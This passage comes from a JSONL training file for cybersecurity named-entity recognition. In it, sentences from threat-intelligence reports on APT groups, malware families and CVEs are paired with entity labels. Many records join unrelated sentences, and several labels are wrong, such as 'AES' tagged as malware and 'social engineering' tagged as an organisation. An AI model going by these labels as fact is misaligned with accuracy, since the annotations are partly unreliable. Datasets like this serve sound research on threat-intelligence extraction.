APT38 ) . HexRaysDeob is an IDA Pro plugin written by Rolf Rolles to address obfuscation seen in binaries . 
Simultaneously , a threat researcher outside of CrowdStrike discovered an attacker ’s tooling via an open repository , downloaded all of the tools , and made them available through a MegaUpload link in a Twitter post.2", "spans": {"MALWARE: Red Alert 2.0": [[0, 13]], "THREAT_ACTOR: groups": [[244, 250]], "THREAT_ACTOR: TEMP.Hermit": [[363, 374]], "THREAT_ACTOR: group": [[388, 393]], "THREAT_ACTOR: APT38": [[425, 430]], "TOOL: HexRaysDeob": [[435, 446]], "TOOL: IDA Pro": [[453, 460]], "THREAT_ACTOR: threat researcher": [[552, 569]], "VULNERABILITY: discovered an attacker ’s tooling via an open repository , downloaded all of the tools": [[593, 679]]}, "info": {"id": "cyberner_stix_train_006766", "source": "cyberner_stix_train"}} {"text": "While the URL acts similarly to how eye-watch.in : 443 delivers payloads , we also saw the URL leveraging and exploiting security flaws in Flash : CVE-2015-8651 , CVE-2016-1019 , and CVE-2016-4117 . At the beginning of March 2018 , as part of our regular tracking of Turla 's activities , we observed some changes in the Mosquito campaign .", "spans": {"VULNERABILITY: CVE-2015-8651": [[147, 160]], "VULNERABILITY: CVE-2016-1019": [[163, 176]], "VULNERABILITY: CVE-2016-4117": [[183, 196]], "THREAT_ACTOR: Turla": [[267, 272]]}, "info": {"id": "cyberner_stix_train_006767", "source": "cyberner_stix_train"}} {"text": "Sofacy Continues Global Attacks and Wheels Out New Cannon Trojan .", "spans": {"THREAT_ACTOR: Sofacy": [[0, 6]], "TOOL: Cannon": [[51, 57]], "MALWARE: Trojan": [[58, 64]]}, "info": {"id": "cyberner_stix_train_006768", "source": "cyberner_stix_train"}} {"text": "Communication between both Trojans and their C & C servers is based on the same principle , the relative addresses to which Trojans send network requests are generated in a similar manner , and the set of possible commands that the two Trojans can perform also overlaps . 
Recently , CTU researchers responded to an intrusion perpetrated by Threat Group-1314 , one of numerous threat groups that employ the \" living off the land \" technique to conduct their intrusions . Once infected , the C&C commands for the infected system launches a loud scanning activity and spreads the botnet by sending a “ whole kit ” of binary files at once with naming conventions same as the ones already in the targeted host , likely banking on breaking through via “ security through obscurity. ” They attempted to evade traffic inspection by encoding the code for the scanner with base-64 . In April 2021 , a new campaign by OilRig was discovered by researchers at Checkpoint in which the group employed a new backdoor variant dubbed SideTwist against what appears to be a Lebanese target .", "spans": {"ORGANIZATION: CTU": [[283, 286]], "THREAT_ACTOR: Threat Group-1314": [[340, 357]], "TOOL: C&C": [[490, 493]], "THREAT_ACTOR: OilRig": [[907, 913]], "ORGANIZATION: Checkpoint": [[947, 957]], "MALWARE: SideTwist": [[1016, 1025]], "ORGANIZATION: Lebanese target": [[1055, 1070]]}, "info": {"id": "cyberner_stix_train_006769", "source": "cyberner_stix_train"}} {"text": "As many people use their mobile devices for online shopping and even to manage their bank accounts , the mobile arena became increasingly profitable for cyber criminals . In order to carry out this operation , it uses publicly available tools , including Mimikatz ( Hacktool.Mimikatz ) and an open-source tool that exploits a known Windows privilege escalation vulnerability ( CVE-2016-0051 ) on unpatched computers . 
MSPs therefore represent a high-payoff target for espionagefocused threat actors such as APT10 .", "spans": {"TOOL: publicly available tools": [[218, 242]], "TOOL: Mimikatz": [[255, 263]], "TOOL: Hacktool.Mimikatz": [[266, 283]], "VULNERABILITY: CVE-2016-0051": [[377, 390]], "ORGANIZATION: MSPs": [[418, 422]], "THREAT_ACTOR: actors": [[492, 498]], "THREAT_ACTOR: APT10": [[507, 512]]}, "info": {"id": "cyberner_stix_train_006770", "source": "cyberner_stix_train"}} {"text": "Also , the longer the delay , the lower the risk of the user associating the unwanted ads with a particular app . We identified decoy files which indicate these attacks began with spear phishing messages but have not observed the actual messages . The last campaign was started a few days ago and is still active .", "spans": {"MALWARE: decoy files": [[128, 139]]}, "info": {"id": "cyberner_stix_train_006771", "source": "cyberner_stix_train"}} {"text": "In June 2018 , APT41 sent spear-phishing emails using an invitation lure to join a decentralized gaming platform linked to a cryptocurrency service (Figure 5) that had positioned itself as a medium of exchange for online games and gambling sites . Throughout our investigation , we have found evidence that shows operational similarities between this implant and Gamaredon Group .", "spans": {"THREAT_ACTOR: APT41": [[15, 20]], "FILEPATH: implant": [[351, 358]], "THREAT_ACTOR: Gamaredon": [[363, 372]]}, "info": {"id": "cyberner_stix_train_006772", "source": "cyberner_stix_train"}} {"text": "A XENOTIME to Remember : Veles in the Wild .", "spans": {"THREAT_ACTOR: XENOTIME": [[2, 10]], "TOOL: Veles": [[25, 30]]}, "info": {"id": "cyberner_stix_train_006773", "source": "cyberner_stix_train"}} {"text": "It contains encrypted java archive “ start.ogg ” in the assets directory and dynamically loads code with dalvik.system.DexClassLoader . 
One of the favorite methods used by the Pitty Tiger group to infect users is to use a Microsoft Office Word document which exploits a specific vulnerability ( CVE-2012-0158 ) . This operation has targeted managed IT service providers , the compromise of which provides APT10 with potential access to thousands of further victims .", "spans": {"THREAT_ACTOR: Pitty Tiger group": [[176, 193]], "MALWARE: Microsoft Office Word document": [[222, 252]], "VULNERABILITY: CVE-2012-0158": [[295, 308]], "ORGANIZATION: managed IT service providers": [[341, 369]], "THREAT_ACTOR: APT10": [[405, 410]]}, "info": {"id": "cyberner_stix_train_006774", "source": "cyberner_stix_train"}} {"text": "First described by Kaspersky in 2014 and later by Cylance in 2017 , Machete is a piece of malware found to be targeting high profile individuals and organizations in Latin American countries . The initial indicator of the attack was a malicious Web shell that was detected on an IIS server , coming out of the w3wp.exe process .", "spans": {"ORGANIZATION: Kaspersky": [[19, 28]], "ORGANIZATION: Cylance": [[50, 57]], "TOOL: Machete": [[68, 75]], "TOOL: Web shell": [[245, 254]], "TOOL: IIS": [[279, 282]], "FILEPATH: w3wp.exe": [[310, 318]]}, "info": {"id": "cyberner_stix_train_006775", "source": "cyberner_stix_train"}} {"text": "X-Force IRIS researchers studied Shamoon ’s attack life cycle and observed its tactics at Saudi-based organizations and private sector companies .", "spans": {"ORGANIZATION: X-Force IRIS": [[0, 12]], "MALWARE: Shamoon": [[33, 40]]}, "info": {"id": "cyberner_stix_train_006776", "source": "cyberner_stix_train"}} {"text": "Again , this deployment was likely a part of their focus on NATO targets .", "spans": {"ORGANIZATION: NATO": [[60, 64]]}, "info": {"id": "cyberner_stix_train_006777", "source": "cyberner_stix_train"}} {"text": "Researching this attack and the malware used therein led Microsoft to discover other instances of PLATINUM attacking users in India around August 2015 . 
Throughout the years , the Mofang group has compromised countless servers belonging to government or other Myanmar related organizations , in order to stage attacks .", "spans": {"ORGANIZATION: Microsoft": [[57, 66]], "THREAT_ACTOR: PLATINUM": [[98, 106]], "ORGANIZATION: users": [[117, 122]], "ORGANIZATION: government": [[240, 250]]}, "info": {"id": "cyberner_stix_train_006778", "source": "cyberner_stix_train"}} {"text": "We don't have hard evidence of how Suckfly obtained information on the targeted user , but we did find a large open-source presence on the initial target .", "spans": {"THREAT_ACTOR: Suckfly": [[35, 42]]}, "info": {"id": "cyberner_stix_train_006779", "source": "cyberner_stix_train"}} {"text": "A well-funded , highly active BlackOasis group of Middle Eastern hackers was caught , yet again , using a lucrative zero-day exploit in the wild to break into computers and infect them with powerful spyware developed by an infamous cyberweapons dealer named Gamma Group . We also observed exploits against older ( patched ) vulnerabilities , social engineering techniques and watering hole strategies in these attacks .", "spans": {"THREAT_ACTOR: BlackOasis group": [[30, 46]], "THREAT_ACTOR: hackers": [[65, 72]], "VULNERABILITY: zero-day exploit": [[116, 132]], "THREAT_ACTOR: Gamma Group": [[258, 269]], "ORGANIZATION: social engineering": [[342, 360]]}, "info": {"id": "cyberner_stix_train_006780", "source": "cyberner_stix_train"}} {"text": "Second , the hex-encoded string is the C&C used by the custom backdoor while in the Delphi backdoor the C&C is embedded in the configuration .", "spans": {"TOOL: C&C": [[39, 42], [104, 107]], "TOOL: Delphi": [[84, 90]]}, "info": {"id": "cyberner_stix_train_006781", "source": "cyberner_stix_train"}} {"text": "We detonated the file in VxStream ’s automated malware analysis capability and found testproj.exe dropped a benign Microsoft Word document that pulls a jpg file from treestower.com .", "spans": {"TOOL: VxStream": [[25, 
33]], "FILEPATH: testproj.exe": [[85, 97]], "ORGANIZATION: Microsoft": [[115, 124]], "TOOL: Word": [[125, 129]], "DOMAIN: treestower.com": [[166, 180]]}, "info": {"id": "cyberner_stix_train_006782", "source": "cyberner_stix_train"}} {"text": "Many of the default strings in this application are in Arabic , including the name . In 2010 US-based HBGary investigated an information security incident related to the Winnti group at one of HBGary 's customers – an American video game company . If a user or an application modifies the ZxShell service registry key , the code restores the original infected service key and values . The majority of the Excel campaigns show some element of luring the user to enable macros in Excel with specific content using Ukrainian language .", "spans": {"ORGANIZATION: HBGary": [[102, 108], [193, 199]], "ORGANIZATION: video game company": [[227, 245]], "MALWARE: ZxShell": [[289, 296]]}, "info": {"id": "cyberner_stix_train_006783", "source": "cyberner_stix_train"}} {"text": "On March 12 and March 14 , we observed the Sofacy group carrying out an attack on a European government agency involving an updated variant of DealersChoice .", "spans": {"THREAT_ACTOR: Sofacy": [[43, 49]], "TOOL: DealersChoice": [[143, 156]]}, "info": {"id": "cyberner_stix_train_006784", "source": "cyberner_stix_train"}} {"text": "] 102 2020-04-14 http : //pub.douglasshome [ . Both BalkanRAT and BalkanDoor spread in Croatia , Serbia , Montenegro , and Bosnia and Herzegovina . menuPass also heavily favors spear phishing , and so takes steps to socially engineer their spear phishes for maximum appearance of legitimacy .", "spans": {"MALWARE: BalkanRAT": [[52, 61]], "MALWARE: BalkanDoor": [[66, 76]]}, "info": {"id": "cyberner_stix_train_006785", "source": "cyberner_stix_train"}} {"text": "Being aware of this fact can help create defensive strategies , as well as prepare for upcoming attacks . 
Instead , we observed the two Russian espionage groups compromise the same systems and engage separately in the theft of identical credentials . The processor function builds a list of files from the files with content that match rcvd* in the receivebox . Vice Society ’s targeting of education is undoubtedly deliberate and has likely allowed the gang to develop domain - specific techniques and expertise .", "spans": {"THREAT_ACTOR: espionage groups": [[144, 160]], "THREAT_ACTOR: Vice Society ’s": [[362, 377]], "ORGANIZATION: education": [[391, 400]]}, "info": {"id": "cyberner_stix_train_006786", "source": "cyberner_stix_train"}} {"text": "In the observed version of the implant it doesn ’ t have an interface to work with the skype_sync2.exe module . From our first malicious sample encounter back in mid-September until now , we have observed 12 infected applications , the majority of which are in the system utility category . Lotus Blossom is a threat group that has targeted government and military organizations in Southeast Asia .", "spans": {"MALWARE: malicious sample": [[127, 143]], "THREAT_ACTOR: Lotus Blossom": [[291, 304]]}, "info": {"id": "cyberner_stix_train_006787", "source": "cyberner_stix_train"}} {"text": "It comes fully loaded with a number of plug-ins to give an attacker complete control of the compromised computer .", "spans": {}, "info": {"id": "cyberner_stix_train_006788", "source": "cyberner_stix_train"}} {"text": "The group targeting Hong Kong media outlets is called admin@338 and is known to researchers for using publicly available remote access Trojans such as Poison Ivy to attack government and financial firms specializing in global economic policy . 
Attackers behind Dyre have used similar tactics in the past but have only deployed their attacks in English speaking countries and Spain .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "ORGANIZATION: media": [[30, 35]], "THREAT_ACTOR: admin@338": [[54, 63]], "TOOL: remote access Trojans": [[121, 142]], "TOOL: Poison Ivy": [[151, 161]], "ORGANIZATION: government": [[172, 182]], "ORGANIZATION: financial firms": [[187, 202]], "ORGANIZATION: global economic": [[219, 234]]}, "info": {"id": "cyberner_stix_train_006789", "source": "cyberner_stix_train"}} {"text": "It appears hacking group Outlaw , which has been silent for the past few months , was simply developing their toolkit for illicit income sources .", "spans": {"THREAT_ACTOR: Outlaw": [[25, 31]]}, "info": {"id": "cyberner_stix_train_006790", "source": "cyberner_stix_train"}} {"text": "Recently there was a huge wave of SMS messages , as well as Whatsapp messages , making the rounds asking users to download the latest version of TikTok at hxxp : //tiny [ . Throughout our investigation , we have found evidence that shows operational similarities between this implant and Gamaredon Group . Distinct changes to Azazel by the Winnti developers include the addition of a function named ‘ Decrypt2 ’ , which is used to decode an embedded configuration similar to the core implant .", "spans": {"SYSTEM: Whatsapp": [[60, 68]], "SYSTEM: TikTok": [[145, 151]], "MALWARE: implant": [[276, 283]], "THREAT_ACTOR: Gamaredon": [[288, 297]], "TOOL: Azazel": [[326, 332]], "MALWARE: Winnti": [[340, 346]], "TOOL: Decrypt2": [[401, 409]]}, "info": {"id": "cyberner_stix_train_006791", "source": "cyberner_stix_train"}} {"text": "The data entered by the user is sent to the cybercriminals . When G-Data published on Turla/Uroburos back in February , several questions remained unanswered . ZxShell ( aka Sensocode ) is a Remote Administration Tool ( RAT ) used by Group 72 to conduct cyber-espionage operations . 
If we look at our previous cyberattack incident , a spear phishing attack likely left indications of malicious browser redirects and malware installation attempts .", "spans": {"ORGANIZATION: G-Data": [[66, 72]], "THREAT_ACTOR: Turla/Uroburos": [[86, 100]], "MALWARE: ZxShell": [[160, 167]], "MALWARE: Sensocode": [[174, 183]], "TOOL: Remote Administration Tool": [[191, 217]], "TOOL: RAT": [[220, 223]], "THREAT_ACTOR: Group 72": [[234, 242]]}, "info": {"id": "cyberner_stix_train_006792", "source": "cyberner_stix_train"}} {"text": "Sending text “ confirm 1 ” will include proof of payment . The OilRig group ( AKA APT34 , Helix Kitten ) is an adversary motivated by espionage primarily operating in the Middle East region . The fact that this attacker decided to leverage cloud services and four different services — and not their own infrastructure — is smart from an opsec point of view . Monitor and analyze traffic flows that do not follow the expected protocol standards and traffic flows ( e.g extraneous packets that do not belong to established flows , or gratuitous or anomalous traffic patterns ) .", "spans": {"THREAT_ACTOR: OilRig group": [[63, 75]], "THREAT_ACTOR: APT34": [[82, 87]], "THREAT_ACTOR: Helix Kitten": [[90, 102]], "THREAT_ACTOR: espionage": [[134, 143]], "TOOL: cloud services": [[240, 254]], "TOOL: four different services": [[259, 282]]}, "info": {"id": "cyberner_stix_train_006793", "source": "cyberner_stix_train"}} {"text": "The data targeted for theft also have similar formats . ScarCruft has several ongoing operations , utilizing multiple exploits — two for Adobe Flash and one for Microsoft Internet Explorer . Kaspersky Lab has been able to retrieve some of these exchanges from a FIN7 target . But a potential of attackers to misuse such access to infect hundreds of millions of Internet users creates a great risk . 
\"", "spans": {"THREAT_ACTOR: ScarCruft": [[56, 65]], "TOOL: Adobe Flash": [[137, 148]], "TOOL: Microsoft Internet Explorer": [[161, 188]], "ORGANIZATION: Kaspersky Lab": [[191, 204]], "THREAT_ACTOR: FIN7": [[262, 266]], "THREAT_ACTOR: attackers": [[295, 304]]}, "info": {"id": "cyberner_stix_train_006794", "source": "cyberner_stix_train"}} {"text": "This type of activity and the malicious use of stolen certificates emphasizes the importance of safeguarding certificates to prevent them from being used maliciously .", "spans": {}, "info": {"id": "cyberner_stix_train_006795", "source": "cyberner_stix_train"}} {"text": "In early versions of Asacub , .com , .biz , .info , .in , .pw were used as top-level domains . CTU researchers assess with high confidence that TG-3390 uses information gathered from prior reconnaissance activities to selectively compromise users who visit websites under its control . The honeynet graphs , which show activity peaks associated with specific actions , also suggest that the scans were timed . When ransomware source code or builders are leaked , it becomes easier for aspiring cybercriminals who lack the technical expertise to develop their own ransomware variants by making only minor modifications to the original code .", "spans": {"MALWARE: Asacub": [[21, 27]], "ORGANIZATION: CTU": [[95, 98]], "THREAT_ACTOR: TG-3390": [[144, 151]], "VULNERABILITY: When ransomware source code or builders are leaked": [[410, 460]]}, "info": {"id": "cyberner_stix_train_006796", "source": "cyberner_stix_train"}} {"text": "PLATINUM 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat . 
A variety of malware , including the PlugX tool , was shared with other known Chinese threat groups .", "spans": {"THREAT_ACTOR: PLATINUM": [[0, 8]], "VULNERABILITY: zero-day exploits": [[143, 160]], "MALWARE: PlugX tool": [[239, 249]]}, "info": {"id": "cyberner_stix_train_006797", "source": "cyberner_stix_train"}} {"text": "Note : Industrial safety instrumented systems comprise part of a multi-layer engineered process control framework to protect life and environment .", "spans": {}, "info": {"id": "cyberner_stix_train_006798", "source": "cyberner_stix_train"}} {"text": "At this point , the attackers know the user has opened the document and send another spear-phishing email , this time containing an MS Word document with an embedded executable . In August and October 2016 we observed a malware operation targeting members of the Tibetan Parliament ( the highest legislative organ of the Tibetan government in exile , formally known as Central Tibetan Administration ) .", "spans": {"THREAT_ACTOR: attackers": [[20, 29]], "MALWARE: MS Word document": [[132, 148]], "ORGANIZATION: Tibetan Parliament": [[263, 281]], "ORGANIZATION: Tibetan government": [[321, 339]], "ORGANIZATION: Central Tibetan Administration": [[369, 399]]}, "info": {"id": "cyberner_stix_train_006799", "source": "cyberner_stix_train"}} {"text": "Quasar serve does not verify that the size , filename , extension , or header of the uploaded file is the same as requested .", "spans": {"MALWARE: Quasar": [[0, 6]]}, "info": {"id": "cyberner_stix_train_006800", "source": "cyberner_stix_train"}} {"text": "PROMETHIUM uses a unique set of tools and methods to perform actions like lateral movement and data exfiltration . 
XENOTIME rose to prominence in December 2017 when Dragos and FireEye jointly published details of TRISIS destructive malware targeting Schneider Electric 's Triconex safety instrumented system .", "spans": {"THREAT_ACTOR: PROMETHIUM": [[0, 10]], "THREAT_ACTOR: XENOTIME": [[115, 123]], "ORGANIZATION: Dragos": [[165, 171]], "ORGANIZATION: FireEye": [[176, 183]], "MALWARE: TRISIS": [[213, 219]]}, "info": {"id": "cyberner_stix_train_006801", "source": "cyberner_stix_train"}} {"text": "These socially engineered emails contain web links of weaponized documents containing exploits or macros . Cadelle , uses Backdoor.Cadelspy .", "spans": {"MALWARE: Backdoor.Cadelspy": [[122, 139]]}, "info": {"id": "cyberner_stix_train_006802", "source": "cyberner_stix_train"}} {"text": "The regular expressions suggest that the C2 server responds with content that is meant to resemble HTTP Live Steaming ( HLS ) traffic , which is a protocol that uses HTTP to deliver audio and video files for streaming .", "spans": {"TOOL: C2": [[41, 43]], "TOOL: HTTP Live Steaming": [[99, 117]], "TOOL: HLS": [[120, 123]]}, "info": {"id": "cyberner_stix_train_006803", "source": "cyberner_stix_train"}} {"text": "The group continued this pattern with occasional URL campaigns and attached HTML files bearing malicious links .", "spans": {"TOOL: HTML": [[76, 80]]}, "info": {"id": "cyberner_stix_train_006804", "source": "cyberner_stix_train"}} {"text": "All of these domains are registered to ‘ Li Jun Biao ’ on Bizcn , Inc , a Chinese Internet application service provider . From February to April 2019 , MuddyWater launched a series of spear-phishing attacks against governments , educational institutions , financial , telecommunications and defense companies in Turkey , Iran , Afghanistan , Iraq , Tajikistan and Azerbaijan . 
APT15 then used a tool known as RemoteExec ( similar to Microsoft .", "spans": {"ORGANIZATION: Bizcn , Inc": [[58, 69]], "THREAT_ACTOR: MuddyWater": [[152, 162]], "ORGANIZATION: governments": [[215, 226]], "ORGANIZATION: educational institutions": [[229, 253]], "ORGANIZATION: financial": [[256, 265]], "ORGANIZATION: telecommunications": [[268, 286]], "ORGANIZATION: defense": [[291, 298]], "THREAT_ACTOR: APT15": [[377, 382]], "MALWARE: RemoteExec": [[409, 419]], "ORGANIZATION: Microsoft": [[433, 442]]}, "info": {"id": "cyberner_stix_train_006805", "source": "cyberner_stix_train"}} {"text": "This technique is associated with the Korplug S-MAL/Plug-x malware and is frequently used in China based cyberespionage activity .", "spans": {"MALWARE: Korplug S-MAL/Plug-x": [[38, 58]]}, "info": {"id": "cyberner_stix_train_006806", "source": "cyberner_stix_train"}} {"text": "Specifically , on the 19th of January 2010 security researcher Tavis Ormandy disclosed a local privilege escalation vulnerability ( CVE-2010-0232 ) affecting Microsoft Windows .", "spans": {"VULNERABILITY: CVE-2010-0232": [[132, 145]], "ORGANIZATION: Microsoft": [[158, 167]], "SYSTEM: Windows": [[168, 175]]}, "info": {"id": "cyberner_stix_train_006807", "source": "cyberner_stix_train"}} {"text": "However , full details on XENOTIME and other group tools , techniques , procedures , and infrastructure is available to network defenders via Dragos WorldView .", "spans": {"THREAT_ACTOR: XENOTIME": [[26, 34]], "ORGANIZATION: Dragos": [[142, 148]], "TOOL: WorldView": [[149, 158]]}, "info": {"id": "cyberner_stix_train_006808", "source": "cyberner_stix_train"}} {"text": "As detailed in the previous section , this malware is able to manipulate and exfiltrate emails . 
It is worth noting that attackers used the same compromised websites to spread Buhtrap as those that had been used for the Corkow Trojan .", "spans": {"MALWARE: compromised websites": [[145, 165]], "MALWARE: Buhtrap": [[176, 183]], "MALWARE: Corkow Trojan": [[220, 233]]}, "info": {"id": "cyberner_stix_train_006809", "source": "cyberner_stix_train"}} {"text": "A full list of the domains can be seen here .", "spans": {}, "info": {"id": "cyberner_stix_train_006810", "source": "cyberner_stix_train"}} {"text": "'' This class will open a WebView with a Google-themed page asking for payment in order to use the Google services . Additional capabilities of the More_eggs malware include the download and execution of files and scripts and running commands using cmd.exe . On occasion the APT37 directly included the ROKRAT payload in the malicious document and during other campaigns the attackers leveraged multi-stage infection processes .", "spans": {"ORGANIZATION: Google-themed": [[41, 54]], "ORGANIZATION: Google": [[99, 105]], "MALWARE: More_eggs malware": [[148, 165]], "MALWARE: cmd.exe": [[249, 256]], "THREAT_ACTOR: APT37": [[275, 280]], "MALWARE: ROKRAT": [[303, 309]], "THREAT_ACTOR: attackers": [[375, 384]]}, "info": {"id": "cyberner_stix_train_006811", "source": "cyberner_stix_train"}} {"text": "If you want to know more about them — our researchers have an article about them on Securelist . Our analysis shows that NetTraveler attempted to exploit CVE-2012-0158 to install NetTraveler Trojan . 
In these websites they hosted malware that was digitally signed with a valid , likely stolen code signing certificate .", "spans": {"ORGANIZATION: Securelist": [[84, 94]], "TOOL: NetTraveler": [[121, 132]], "VULNERABILITY: CVE-2012-0158": [[154, 167]], "TOOL: NetTraveler Trojan": [[179, 197]], "MALWARE: stolen code signing certificate": [[286, 317]]}, "info": {"id": "cyberner_stix_train_006812", "source": "cyberner_stix_train"}} {"text": "RuMMS samples and C2 servers Figure 8 shows how these samples , C2 servers and hosting websites are related to each other , including when they were compiled or observed . This latest attack consisted of three waves between May and June 2018 . We identified three malicious Microsoft Office B-IDTY I-TOOL documents that download and load an additional Office document with a Macro . “ And his access was never shut off until today ? , ” asked the company ’s general counsel Mike Dacks .", "spans": {"MALWARE: RuMMS": [[0, 5]], "TOOL: Microsoft": [[274, 283]], "TOOL: Macro": [[375, 380]], "ORGANIZATION: company ’s general counsel": [[447, 473]], "ORGANIZATION: Mike Dacks": [[474, 484]]}, "info": {"id": "cyberner_stix_train_006813", "source": "cyberner_stix_train"}} {"text": "At this time of writing , FireEye Multi Vector Execution (MVX) engine is able to recognize and block this threat . This alert 's IOC files provide HIDDEN COBRA indicators related to FALLCHILL .", "spans": {"ORGANIZATION: FireEye": [[26, 33]], "TOOL: (MVX)": [[57, 62]], "FILEPATH: IOC files": [[129, 138]], "THREAT_ACTOR: HIDDEN COBRA": [[147, 159]], "MALWARE: FALLCHILL": [[182, 191]]}, "info": {"id": "cyberner_stix_train_006814", "source": "cyberner_stix_train"}} {"text": "TimeReceiver android.intent.action.ACTION_TIME_CHANGED System notification that the time was set . Selective deployment of ROCKBOOT suggests that APT41 reserves more advanced TTPs and malware only for high-value targets . 
Several sources consider APT28 a group of CyberMercs based in Russia .", "spans": {"ORGANIZATION: ROCKBOOT": [[123, 131]], "THREAT_ACTOR: APT41": [[146, 151]], "THREAT_ACTOR: APT28": [[247, 252]]}, "info": {"id": "cyberner_stix_train_006815", "source": "cyberner_stix_train"}} {"text": "The most advanced mobile malicious programs today are Trojans targeting users ’ bank accounts – the most attractive source of criminal earnings . The malicious loader will use dynamic-link library ( DLL ) hijacking — injecting malicious code into a process of a file/application — on sidebar.exe and launch dllhost.exe ( a normal file ) . Once installed on the system , ShadowPad starts a hidden and suspended Microsoft Windows Media Player wmplayer.exe process and injects itself into that process . Although we have not identified sufficient evidence to determine the origin or purpose of COSMICENERGY , we believe that the malware was possibly developed by either Rostelecom - Solar or an associated party to recreate real attack scenarios against energy grid assets .", "spans": {"MALWARE: sidebar.exe": [[284, 295]], "MALWARE: dllhost.exe": [[307, 318]], "MALWARE: ShadowPad": [[370, 379]], "TOOL: Microsoft Windows Media Player": [[410, 440]], "FILEPATH: wmplayer.exe": [[441, 453]], "MALWARE: COSMICENERGY": [[591, 603]]}, "info": {"id": "cyberner_stix_train_006816", "source": "cyberner_stix_train"}} {"text": "Unlike HammerDuke however , the URLs for the images downloaded by GeminiDuke are hardcoded in its initial configuration , rather than retrieved from Twitter .", "spans": {"MALWARE: HammerDuke": [[7, 17]], "MALWARE: GeminiDuke": [[66, 76]], "TOOL: Twitter": [[149, 156]]}, "info": {"id": "cyberner_stix_train_006817", "source": "cyberner_stix_train"}} {"text": "The Conversations modified samples differ from the original one in the getKnownHosts method that was modified to replace the main XMPP host with the attackers ’ C2 server : It appears that the attackers were using a specific C2 for 
the use of that app . From Buhtrap perpetrating cybercrime for financial gain , its toolset has been expanded with malware used to conduct espionage in Eastern Europe and Central Asia . But before the ScarCruft infection , however , another APT group also targeted this victim with the host being infected with GreezeBackdoor on March 26, 2018 .", "spans": {"SYSTEM: XMPP": [[130, 134]], "THREAT_ACTOR: Buhtrap": [[259, 266]], "THREAT_ACTOR: ScarCruft": [[433, 442]], "MALWARE: GreezeBackdoor": [[543, 557]]}, "info": {"id": "cyberner_stix_train_006818", "source": "cyberner_stix_train"}} {"text": "Furthermore , it can grant the “ com.qualcmm.timeservices ” app Device Administrator rights without any interaction with the user , just by running commands . Working backwards from each Internet address , I was able to see that in the last few months of 2018 the hackers behind DNSpionage succeeded in compromising key components of DNS infrastructure for more than 50 Middle Eastern companies and government agencies , including targets in Albania , Cyprus , Egypt , Iraq , Jordan , Kuwait , Lebanon , Libya , Saudi Arabia and the United Arab Emirates . We first published details about the APT in our January 2010 M-Trends report . These URLs provide access to the C2s , which then provide potential commands and encrypted transfers of additional backdoors onto the system via GIF files .", "spans": {"ORGANIZATION: companies": [[385, 394]], "ORGANIZATION: government agencies": [[399, 418]], "ORGANIZATION: M-Trends": [[617, 625]]}, "info": {"id": "cyberner_stix_train_006819", "source": "cyberner_stix_train"}} {"text": "It checks for different kinds of emulators , including QEMU , Genymotion , BlueStacks and Bignox . Attachments are typically sent as an executable file embedded in a ZIP archive or a password-protected Microsoft Office document . Kaspersky Lab verdicts for the malware used in this and related attacks . 
None After initial access via this new exploit method , the threat actor leveraged maintain access , and performed anti - forensics techniques on the Microsoft Exchange server in an attempt to hide their activity .", "spans": {"SYSTEM: QEMU": [[55, 59]], "SYSTEM: Genymotion": [[62, 72]], "SYSTEM: BlueStacks": [[75, 85]], "SYSTEM: Bignox": [[90, 96]], "MALWARE: Attachments": [[99, 110]], "ORGANIZATION: Kaspersky Lab": [[230, 243]], "THREAT_ACTOR: threat actor": [[364, 376]], "SYSTEM: Microsoft Exchange server": [[454, 479]]}, "info": {"id": "cyberner_stix_train_006820", "source": "cyberner_stix_train"}} {"text": "For system administrators and information security professionals , configuring the router to be more resistant to attacks like DNS cache poisoning can help mitigate similar threats . Lazarus was linked to the $81 million theft from the Bangladesh central bank in 2016 , along with a number of other bank heists . Since then , threat actors leveraging Winnti malware have victimized a diverse set of targets forvaried motivations .", "spans": {"THREAT_ACTOR: Lazarus": [[183, 190]], "ORGANIZATION: Bangladesh central bank": [[236, 259]], "MALWARE: Winnti": [[351, 357]]}, "info": {"id": "cyberner_stix_train_006821", "source": "cyberner_stix_train"}} {"text": "Fast forward five months to the current attacks and we see exploitation of the same vulnerability at government organizations in two different countries compared to the April attacks .", "spans": {}, "info": {"id": "cyberner_stix_train_006822", "source": "cyberner_stix_train"}} {"text": "Using a profiling script to deploy zero-days and other tools more selectively , decreasing the chance that researchers and others will gain access to the group ’s tools .", "spans": {"VULNERABILITY: zero-days": [[35, 44]]}, "info": {"id": "cyberner_stix_train_006823", "source": "cyberner_stix_train"}} {"text": "Chrysaor was never available in Google Play and had a very low volume of installs outside of Google Play . 
Another intrusion approach used by Leafminer seems a lot less sophisticated than the previously described methods but can be just as effective : using specific hacktools to guess the login passwords for services exposed by a targeted system . Yet again , new supply-chain attacks recently caught the attention of ESET Researchers . The attackers also leveraged DLL sideloading in that campaign to load their HyperBro malware .", "spans": {"MALWARE: Chrysaor": [[0, 8]], "SYSTEM: Google Play": [[32, 43], [93, 104]], "THREAT_ACTOR: Leafminer": [[142, 151]], "TOOL: hacktools": [[267, 276]], "ORGANIZATION: ESET": [[420, 424]], "THREAT_ACTOR: attackers": [[443, 452]], "MALWARE: HyperBro malware": [[515, 531]]}, "info": {"id": "cyberner_stix_train_006824", "source": "cyberner_stix_train"}} {"text": "PlugX is a modular structured malware that has many different operational plugins such as communication compression and encryption , network enumeration , files interaction , remote shell operations and more . It employs AES in addition to SID tricks , making it difficult to decrypt sensitive data .", "spans": {"MALWARE: PlugX": [[0, 5]], "MALWARE: AES": [[221, 224]], "MALWARE: SID": [[240, 243]]}, "info": {"id": "cyberner_stix_train_006825", "source": "cyberner_stix_train"}} {"text": "Transparent Tribe has been active for several years and conducting suspected intelligence collection operations against South Asian political and military targets . Kaspersky Lab products detect the Octopus Trojan as Trojan.Win32.Octopus.gen .", "spans": {"ORGANIZATION: political": [[132, 141]], "ORGANIZATION: military": [[146, 154]], "ORGANIZATION: Kaspersky Lab": [[165, 178]], "MALWARE: Octopus Trojan": [[199, 213]]}, "info": {"id": "cyberner_stix_train_006826", "source": "cyberner_stix_train"}} {"text": "It loads code from encrypted resources dynamically , which most detection engines can not penetrate and inspect . 
